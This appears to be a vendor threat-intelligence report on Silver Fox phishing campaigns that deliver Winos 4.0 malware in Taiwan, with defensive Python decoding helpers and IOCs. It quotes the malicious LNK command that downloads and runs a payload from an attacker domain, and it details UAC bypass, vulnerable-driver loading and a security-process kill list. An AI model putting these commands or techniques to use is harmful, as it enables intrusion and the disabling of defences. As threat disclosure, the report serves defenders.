By Cara Lin | February 20, 2026

Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks
Severity Level: High

FortiGuard Labs recently observed several targeted phishing campaigns in Taiwan that use themes designed to exploit local business processes. These campaigns disseminate Winos 4.0 (ValleyRat) and subsequent malicious plugins through weaponized attachments or embedded links. The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.

Our analysis of domain registration data reveals that attackers use a rotating set of domains and cloud services to host and distribute malware. The highly volatile nature of this infrastructure renders traditional, static domain blocking insufficient as a primary defense. Over the past two months, we have identified various delivery techniques, including malicious LNK files used for a downloader, DLL sideloading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using "wsftprm.sys." The following sections provide technical details and the associated activities of Silver Fox.

Figure 1: Attacker’s domain

Campaign 1: Malicious LNK via Tax-Themed Phishing

The first campaign leverages a tax-themed lure to deceive users into executing a multi-stage infection chain. The attack begins with a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.

Figure 2: Archive contents with LNK and social-engineering decoys

The LNK file utilizes a relative path to invoke the system command processor: ..\..\..\..\Windows\System32\cmd.exe. By calling cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload while evading detection:

Arguments:
/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & %windir%\System32\DeviceCredentialDeployment.exe & Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & %public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe h^tt^p^s:/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe

This script first creates a working directory at %public%\501. It then performs system binary masquerading by copying the legitimate system utility curl.exe to this new directory and renaming it to url.exe to bypass simple filename-based monitoring. The renamed file is then used to download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn. During this process, the script also triggers DeviceCredentialDeployment.exe to maintain the appearance of normal system activity.
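The caret obfuscation in the LNK arguments above is trivial for cmd.exe to undo but defeats naive string matching. The following added triage helper (our own example, not code from the report or the malware) strips cmd.exe caret escapes, splits the /C string into its individual commands, and pulls out the indicators a defender wants to alert on: the download URL, the renamed copy of curl.exe, and execution from %public%. The command line is the one quoted above with the download domain defanged.

```python
import re

# cmd.exe arguments from the tax-themed LNK described above, with the
# download domain defanged ("[.]") so the sample is safe to handle.
LNK_ARGS = (
    r"/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & "
    r"%windir%\System32\DeviceCredentialDeployment.exe & "
    r"Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & "
    r"%public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe "
    r"h^tt^p^s:/^/bq^dr^zbyq[.]cn/Set^up^64.e^x^e & %public%\501\Setup64.exe"
)

def uncaret(s: str) -> str:
    """Undo cmd.exe caret escaping: '^' makes the following character literal."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def split_commands(args: str) -> list:
    """Split a de-obfuscated /C string on the '&' command separator."""
    return [c.strip() for c in args.split("&") if c.strip()]

def triage(args: str) -> dict:
    """Extract detection-relevant indicators from one cmd.exe /C string."""
    cmds = split_commands(uncaret(args))
    findings = {"commands": cmds, "urls": [], "lolbin_copies": [], "flags": []}
    for c in cmds:
        findings["urls"] += re.findall(r"https?://\S+", c, re.I)
        # curl.exe copied under a different name: system binary masquerading
        m = re.match(r"copy\s+/y\s+(\S*curl\.exe)\s+(\S+)", c, re.I)
        if m and not m.group(2).lower().endswith("curl.exe"):
            findings["lolbin_copies"].append((m.group(1), m.group(2)))
    if args.count("^") >= 5:
        findings["flags"].append("caret-obfuscated")
    if any(c.lower().startswith("%public%") for c in cmds):
        findings["flags"].append("execution from %public%")
    return findings

if __name__ == "__main__":
    for key, value in triage(LNK_ARGS).items():
        print(f"{key}: {value}")
```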

Figure 3: The downloaded executable

Once the downloaded installer “64位安装包_特別版” is executed, it extracts resources by locating an embedded executable in the resource section named “EXPAND.” This embedded payload is extracted and written to the local path C:\ProgramData\Golden. This stage serves as the foundation for the later deployment of Winos 4.0 (ValleyRat) and the loading of the driver for defensive evasion.

Figure 4: The resources of the downloaded executable

We will go through the entire execution of Winos 4.0 in a later section.

Campaign 2: DLL-sideloading via Tax or E-invoice Phishing

The second campaign involves distributing various forged Ministry of Finance documents via phishing emails. One technique leverages the URL hxxp://taxfnat[.]tw/ to impersonate an official Taiwanese domain, while actually redirecting victims to a cloud service on the mainland at hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar to download a compressed archive.

Figure 5: Tax-themed phishing

Another variation is to send the e-invoice via email. It displays the link as hxxps://www.einvoice.nat.gov[.]tw/, though it actually connects to hxxps://njhwuyklw[.]com/, which leads to the cloud download path hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar.

Figure 6: E-invoice phishing mail

In the past two months, the downloaded archives have shifted strategy. Rather than using a shortcut file (LNK) as an intermediate downloader that fetches a single malicious executable, the attacker now delivers an archive containing a DLL that is sideloaded through a legitimate application. This campaign uses the same method for loading the malicious driver as the first wave and connects to the same C2 address.

Figure 7: The execution file and the malicious DLL file

In this campaign, the PDB path within the malicious DLL is C:\Users\Administrator\Desktop\大馬專案(二)\x64\Release\DLL.pdb. This distinct project name, "大馬專案(二)," suggests that the Silver Fox group has organized its operations into projects with specific names. Through this string, we tracked another operation utilizing a legitimate file named 綜合所得稅電子結算申報繳稅.exe for DLL sideloading, though the C2 infrastructure for that campaign has migrated to 154[.]91.64.246. These observations indicate that the attack campaign is likely to continue evolving.

Final Payload: Winos 4.0 (ValleyRat)

Before initiating its core functions, the Winos 4.0 loader calls RunUAC() to ensure it is operating within a high-integrity environment. This process begins with a dynamic privilege check using CheckAdminPrivileges. If the process already possesses administrative rights, it skips further escalation to minimize system noise. Otherwise, it calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking. By leveraging the whitelisted system binary computerdefaults.exe, the malware can elevate its thread to administrator level without triggering a UAC prompt.

Figure 8: Bypass UAC

The malware's data fields contain numerous Base64-encoded strings used to load drivers and target security software. The core driver involved is wsftprm.sys (File Description: Topaz OFD - PM), a 64-bit, validly signed Windows kernel-mode driver (version 2.0.0.0). To load this driver, the malware performs a Bring Your Own Vulnerable Driver (BYOVD) attack by dynamically obtaining Native APIs from ntdll.dll, such as RtlInitUnicodeString, NtLoadDriver, and RtlAdjustPrivilege, which allow it to bypass standard service monitoring.

Figure 9: The extracted driver

It also queries registry values for VulnerableDriverBlocklistEnable under SYSTEM\CurrentControlSet\Control\CI\Config and the backup path ControlSet001. Depending on the system's defense state, it dynamically adjusts its registry loading paths. In these steps, we also found that error messages are encoded in Simplified Chinese (GBK).

Figure 10: Checks the registry setting

Once kernel privileges are obtained through wsftprm.sys, the malware enters a monitoring loop to cross-reference active processes against a hardcoded list of security products. The target list includes: ZhuDongFangYu.exe, 360tray.exe, 360sd.exe, HipsDaemon.exe, HipsMain.exe, HipsTray.exe, wsctrlsvc.exe, SecurityHealthHost.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, MpDefenderCoreService.exe, 2345SoftmgrSvc.exe, 2345SoftmgrDaemon.exe, 2345SoftMgr.exe, MSPCManager.exe, MSPCManagerService.exe, smartscreen.exe, MsMpEng.exe, NisSrv.exe, wsc_proxy.exe, wsccommunicator.exe, AvastSvc.exe, bdservicehost.exe, AVGSvc.exe, 360rps.exe, 360rp.exe, qmbsrv.exe, QQPCTray.exe, QQPCRTP.exe, uiWinMgr.exe, uiSeAgnt.exe, PtSessionAgent.exe, PtWatchDog.exe, PtSvcHost.exe, AMSPTelemetryService.exe, unsecapp.exe, uiWatchDog.exe, coreFrameworkHost.exe, coreServiceShell.exe, TmsaInstance64.exe, and ConfigSecurityPolicy.exe.

This list covers a wide range of protection tools, including Microsoft Defender, Trend Micro, Symantec, and security suites such as HuoRong and 360. Terminating these processes achieves a clean environment for Winos 4.0 to persist, escalate privileges, and maintain remote control without interference.

Figure 11: Targeted list in double Base64 encoding

Winos 4.0 hides its C2 address, 47[.]76[.]86[.]151, using Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==). After verifying the system version, it connects to its C2 to load the core component, 上线模块.dll (online module).
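Both the C2 string quoted above and the security-product list in Figure 11 are wrapped in more than one Base64 layer, so a single decode yields another Base64 string rather than plaintext. The added helper below (our own example, not code from the report) peels layers until the result is no longer valid Base64, then checks whether the plaintext is an IPv4 address or a process name. The C2 string is the one quoted above; the kill-list sample is constructed here by encoding one process name from the report's list twice.

```python
import base64
import binascii
import re
from typing import List, Optional

# Layered-Base64 C2 string as quoted in the report above.
C2_ENCODED = "TkRjdU56WXVPRFl1TVRVeA=="

# Constructed sample: one entry from the targeted-process list, wrapped in two
# Base64 layers the way Figure 11 shows (built here, not taken from a sample).
KILL_LIST_ENTRY_ENCODED = base64.b64encode(base64.b64encode(b"MsMpEng.exe")).decode()

_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")

def decode_layers(blob: str, max_depth: int = 5) -> List[str]:
    """Peel Base64 layers until the text stops being valid Base64.

    Returns every layer, outermost first; the last element is the plaintext.
    Plaintexts containing '.' (IPs, *.exe names) can never be mistaken for a
    further layer because '.' is outside the Base64 alphabet.
    """
    layers = [blob]
    for _ in range(max_depth):
        cur = layers[-1].strip()
        if not _B64.match(cur) or len(cur) % 4:
            break
        try:
            raw = base64.b64decode(cur, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(raw)
    return layers

def recover_c2(blob: str) -> Optional[str]:
    """Return the IPv4 address hidden in a layered-Base64 string, if any."""
    plain = decode_layers(blob)[-1]
    return plain if _IPV4.match(plain) else None

def recover_process_name(blob: str) -> Optional[str]:
    """Return the *.exe name hidden in a layered-Base64 string, if any."""
    plain = decode_layers(blob)[-1]
    return plain if plain.lower().endswith(".exe") else None

if __name__ == "__main__":
    print("C2:", recover_c2(C2_ENCODED))
    print("kill-list entry:", recover_process_name(KILL_LIST_ENTRY_ENCODED))
```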

Figure 12: C2 connection and the downloaded online module

It then downloads other plugins and 登录模块 (login module), and stores them directly in the registry, allowing them to be loaded into memory without writing physical files to disk. The specific plugins identified in this campaign include: 文件管理 (file management), 高速屏幕 (high-speed screen), 娱乐屏幕 (entertainment screen), 差异屏幕 (differential screen), and 系统管理 (system management). Together, these plugins provide file management, screen capture, remote control, and system management capabilities.

Figure 13: The modules saved in the registry

Investigation and Attribution

Based on similar file path patterns, we identified a related archive hosted at hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z. Our tracking confirms that campaigns dating back to January 2026 utilize the same C2, 47[.]76[.]86[.]151. Further analysis of domain registration data revealed a consistent registrant name, "李积强," and an associated email address, gongluliu@zju.edu[.]cn, which also appeared in the text file from the first campaign. Also, the LNK metadata contains the MachineID “desktop-t3n3m3q.” This specific ID was observed in Silver Fox APT activity in August 2025, during an environmental check routine. This strongly suggests that the identifier belongs to systems used by the attackers during malware development. Given the identical driver-abuse techniques and overlapping infrastructure, we assess with high confidence that these campaigns are the work of the same specialized subgroup within Silver Fox.

Conclusion

Since last year, FortiGuard Labs has exposed multiple operations involving Winos 4.0 (ValleyRat), revealing a persistent threat actor specifically targeting organizations across Asia. This group demonstrates a high level of sophistication in designing localized phishing lures, often registering domains that appear to be related to country-specific text to enhance the perceived legitimacy of their tax-themed and official document decoys.

The technical evolution of this group is evident in its shift toward memory-resident execution for additional plugins, leaving minimal physical footprints on the local disk. The exposure of internal project names, such as 大馬專案, alongside consistent development machine identifiers, indicates a well-organized operation with a mature toolset and structured planning. As this threat actor continues to refine its evasion techniques and infrastructure, users and organizations must remain highly vigilant. It is critical to treat any documents or links from non-trusted sources with extreme caution to prevent infection by this evolving threat.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

W64/Agent.ATW!tr

The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.

FortiMail flags the initial phishing emails with a "Virus Detected" verdict. In addition, real-time anti-phishing protection provided by FortiSandbox, embedded across Fortinet’s FortiMail, web filtering, and antivirus solutions, enables advanced detection of both known and unknown phishing attempts. The FortiPhish phishing simulation service further supports user resilience by actively training and testing end users against real-world phishing techniques, including impersonation, Business Email Compromise (BEC), and ransomware delivery.

The FortiGuard CDR (Content Disarm and Reconstruction) service, available on both FortiGate and FortiMail, can neutralize malicious content embedded in documents by removing active code while preserving document usability.

The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.

Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity.

If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.

IOCs

Domains


IP

47[.]76[.]86[.]151

URLs

hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z

SHA256

64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a Setup.exe
156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe AISafeSDK64.dll